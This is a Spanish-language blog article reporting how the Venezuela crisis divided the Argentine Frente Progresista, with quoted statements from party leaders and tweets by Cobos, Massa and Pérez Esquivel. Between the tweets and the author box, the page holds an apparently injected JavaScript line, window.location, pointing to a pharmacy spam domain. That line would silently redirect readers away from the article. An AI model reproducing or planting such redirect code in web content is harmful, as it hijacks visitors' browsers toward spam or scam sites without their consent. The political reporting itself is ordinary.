La crisis de Venezuela reaviva las viejas diferencias políticas del Frente Progresista

La crisis en Venezuela reavivó viejas contradicciones ideológicas y políticas entre las fuerzas que integran el Frente Progresista, que conspiran contra la voluntad de ese espacio en formación de unificar un discurso coherente para convertirse en alternativa de poder en 2015. Mientras la UCR y la Coalición Cívica salieron a condenar enérgicamente “el autoritarismo y la represión del gobierno de Venezuela contra estudiantes y dirigentes de la oposición”, el socialismo, Proyecto Sur y Libres del Sur rechazaron “toda forma de violencia” y pidieron “respetar el mandato popular de Nicolás Maduro”, en una postura cercana a la del Gobierno Nacional. Y una vez más recrudeció el debate interno.
En un comunicado, el radicalismo repudió “las acciones de violencia política” y “la existencia de grupos de choque organizados por el gobierno venezolano destinados a atacar manifestaciones populares opositoras” y habló de “retroceso en la cultura política Latinoamericana que remite a las dictaduras”. Y vía Twitter, el jefe del partido, Ernesto Sanz, no paró de reclamar la libertad del opositor Leopoldo López.
Elisa Carrió, por su parte, pidió a través del diputado Fernando Sánchez que el Gobierno Nacional convoque de urgencia al Mercosur y a la Unasur “para evaluar la grave violación de los principios democráticos y republicanos denunciados por la oposición venezolana”.
Casi en otra vereda, el Partido Socialista de Hermes Binner expresó “su absoluto apoyo a la defensa del orden constitucional y al respeto a la voluntad soberana del pueblo venezolano, expresada en las urnas hace pocos meses”. En la misma línea, Fernando ‘Pino’ Solanas pidió que la oposición de ese país “se mantenga en un irrestricto respeto a la institucionalidad y la legitimidad del gobierno elegido democráticamente”.
Libres del Sur, en tanto, publicó un comunicado apoyando a Maduro en su página web, en medio del silencio de sus dos referentes Victoria Donda y Humberto Tumini, que nunca ocultaron, al igual que ‘Pino’, su admiración por Hugo Chávez.
No es la primera vez que Venezuela u otros temas de política exterior, como la firma del acuerdo con Irán, divide a las fuerzas denominadas de centroizquierda. Incluso, los partidos de Binner, ‘Pino’ y Donda han acompañado en el Congreso iniciativas clave del kirchnerismo que el resto del arco opositor rechazó, como la nacionalización de Aerolíneas Argentinas. El problema radica esta vez en la oportunidad política en que afloran las contradicciones, justo cuando el frente se prepara para hacer su debut público y dar un golpe de efecto con un acto previsto para fin de marzo en un teatro porteño. Por caso, está en plena redacción una carta de compromiso que sentará las bases de la futura plataforma común y que los principales referentes –y presidenciables– del espacio presentarán allí con bombos y platillos. Nada que reviva el recuerdo de la Alianza UCR Frepaso, cuyasdiferencias internas llevaron al fracaso al Gobierno de Fernando de la Rúa, es conveniente para este nuevo actor político, que pretende instalarse como alternativa no peronista al kirchnerismo.
<< Nota Anterior Nota Siguiente >> 3dias
Julio Cobos @juliocobos 4.741 Tweets
54 Siguiendo
67.400 Seguidores
“Pedimos por la paz, por la no violencia, por el respeto a la oposición, pedimos por la seguridad del pueblo de Venezuela.”
Sergio Massa @SergioMassa 1.897 Tweets
791 Siguiendo
306.000 Seguidores
“Sólo los débiles y los cobardes persiguen a los jóvenes, que han sido muchísimas veces motor de los cambios más profundos. #Venezuela”
Adolfo Pérez Esquivel @PrensaPEsquivel 2.360 Tweets
590 Siguiendo
23.800 Seguidores
“No es cierto que la Argentina no apoya a Maduro. Muchos siempre apoyamos el proceso revolucionario iniciado por el ex presidente Hugo Chávez.”

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *